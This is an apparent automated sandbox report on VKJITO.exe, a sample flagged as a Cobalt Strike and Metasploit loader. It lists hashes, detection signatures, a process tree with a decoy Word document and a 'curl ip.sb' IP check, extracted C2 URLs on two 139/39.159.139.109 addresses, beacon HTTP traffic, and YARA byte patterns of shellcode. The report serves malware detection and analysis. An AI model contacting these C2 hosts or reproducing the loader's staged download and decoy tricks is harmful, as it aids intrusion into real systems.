Windows Analysis Report
VKJITO.exe

Overview

General Information

Sample name: VKJITO.exe
Analysis ID: 1577651
MD5: 34bfa047aaca8fd4dc99759ebf0e1a6a
SHA1: ae43a10d462f09aa7b945b5b37aad9c0d1df4b01
SHA256: 517b6b3e890f7b93e0006cd8486b778075ebcc647565d37f2186500a8ddc1ff7
Tags: exe user-smica83

Detection

CobaltStrike, Metasploit
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
AI detected landing page (webpage, office document or email)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • VKJITO.exe (PID: 3056 cmdline: "C:\Users\user\Desktop\VKJITO.exe" MD5: 34BFA047AACA8FD4DC99759EBF0E1A6A)
    • curl.exe (PID: 4068 cmdline: "curl" ip.sb MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 3008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7092 cmdline: "cmd" /c start C:\Users\user\Desktop\???????.docx MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WINWORD.EXE (PID: 4308 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • WerFault.exe (PID: 1656 cmdline: C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}
{"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp
Rule: Windows_Trojan_Metasploit_7bc0f998
Description: Identifies the API address lookup function leverage by metasploit shellcode
Author: unknown
Strings:
  • 0x1900b:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61

Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp
Rule: Windows_Trojan_Metasploit_c9773203
Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.
Author: unknown
Strings:
  • 0x19077:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_MetasploitPayload_3
Description: Yara detected Metasploit Payload
Author: Joe Security

Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_CobaltStrike_3
Description: Yara detected CobaltStrike
Author: Joe Security

Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Metasploit_7bc0f998
Description: Identifies the API address lookup function leverage by metasploit shellcode
Author: unknown
Strings:
  • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61

Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Metasploit_c9773203
Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.
Author: unknown
Strings:
  • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_MetasploitPayload_3
Description: Yara detected Metasploit Payload
Author: Joe Security

        System Summary

        Source: Network Connection Author: Florian Roth (Nextron Systems): Data: DestinationIp: 139.159.139.109, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\VKJITO.exe, Initiated: true, ProcessId: 3056, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
        No Suricata rule has matched

        AV Detection

        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: CobaltStrike {"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}
        Source: VKJITO.exe ReversingLabs: Detection: 42%
        Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D4342940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF7D4342940
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D4349A10 BCryptGenRandom,0_2_00007FF7D4349A10

        Phishing

        Source: Screenshot id: 9 Joe Sandbox AI: Screenshot id: 9 contains prominent button: 'download'
        Source: Screenshot id: 10 Joe Sandbox AI: Screenshot id: 10 contains prominent button: 'download'
        Source: VKJITO.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: winword.exe Memory has grown: Private usage: 1MB later: 82MB

        Networking

        Source: Malware configuration extractor URLs: http://39.159.139.109:8080/uz68
        Source: Malware configuration extractor URLs: http://139.159.139.109/uz68
        Source: global traffic TCP traffic: 192.168.2.5:49707 -> 139.159.139.109:8080
        Source: Joe Sandbox View IP Address: 104.26.12.31 104.26.12.31
        Source: Joe Sandbox View ASN Name: HWCSNETHuaweiCloudServicedatacenterCN HWCSNETHuaweiCloudServicedatacenterCN
        Source: global traffic HTTP traffic detected: GET /uz68 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: 139.159.139.109:8080 Connection: Keep-Alive Cache-Control: no-cache
        Source: unknown TCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: ip.sb User-Agent: curl/7.83.1 Accept: */*
        Source: global traffic DNS traffic detected: DNS query: ip.sb
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B0E000.00000004.00000020.00020000.00000000.sdmp, VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://139.159.139.109:8080/uz68
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://139.159.139.109:8080/uz68cex
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://139.159.139.109:8080/uz68fap
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://139.159.139.109:8080/uz68g
        Source: curl.exe, 00000001.00000002.2054270083.0000022B7B259000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip.sb/
        Source: curl.exe, 00000001.00000002.2054270083.0000022B7B259000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip.sb/00005
        Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net

        System Summary

        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPED Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPED Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D4340E60 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7D4340E60
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D431CEC0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,0_2_00007FF7D431CEC0
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D4340D00 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7D4340D00
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: String function: 00007FF7D432A450 appears 73 times
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: String function: 00007FF7D4312AC0 appears 64 times
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: String function: 00007FF7D435C330 appears 47 times
        Source: C:\Users\user\Desktop\VKJITO.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPED Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPED Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: classification engine Classification label: mal92.troj.winEXE@12/235@1/3
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D43208B9 memset,GetModuleHandleW,FormatMessageW,memmove,GetLastError,0_2_00007FF7D43208B9
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
        Source: C:\Users\user\Desktop\VKJITO.exe File created: C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3008:120:WilError_03
        Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3056
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{E0D17D01-5636-4B1F-B917-5E8F8067BDEC} - OProcSessId.dat
        Source: VKJITO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\VKJITO.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown Process created: C:\Users\user\Desktop\VKJITO.exe "C:\Users\user\Desktop\VKJITO.exe"
        Source: C:\Users\user\Desktop\VKJITO.exe Process created: C:\Windows\System32\curl.exe "curl" ip.sb
        Source: C:\Windows\System32\curl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\VKJITO.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: unknown unknown
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: vcruntime140.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: vcruntime140_1.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: vcruntime140.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: msvcp140.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: xmllite.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: mlang.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
        Source: C:\Users\user\Desktop\VKJITO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: ???????.LNK.6.drLNK file: ..\..\..\..\..\Desktop\.docx
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
        Source: VKJITO.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: VKJITO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: VKJITO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: VKJITO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: VKJITO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: VKJITO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: VKJITO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Users\user\Desktop\VKJITO.exe | Code function: 0_2_00007FF7D4321880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF7D4321880
        Source: C:\Users\user\Desktop\VKJITO.exe | Code function: 0_2_000001A673A102FA push eax; ret 0_2_000001A673A10364
        Source: C:\Users\user\Desktop\VKJITO.exe | Code function: 0_2_000001A673A10128 push eax; ret 0_2_000001A673A10364
        Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Source: Amcache.hve.9.dr | Binary or memory string: VMware
        Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.9.dr | Binary or memory string: vmci.syshbin
        Source: Amcache.hve.9.dr | Binary or memory string: VMware, Inc.
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWm
        Source: Amcache.hve.9.dr | Binary or memory string: VMware20,1hbin@
        Source: Amcache.hve.9.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.9.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.9.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: Amcache.hve.9.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.9.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.9.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.9.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: curl.exe, 00000001.00000003.2054053753.0000022B7B264000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: Amcache.hve.9.dr | Binary or memory string: vmci.sys
        Source: Amcache.hve.9.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.9.dr | Binary or memory string: vmci.syshbin`
        Source: Amcache.hve.9.dr | Binary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.9.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.9.dr | Binary or memory string: VMware20,1
        Source: Amcache.hve.9.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.9.dr | Binary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.9.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.9.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.9.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.9.dr | Binary or memory string: VMware PCI VMCI Bus Device
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@K
        Source: Amcache.hve.9.dr | Binary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual RAM
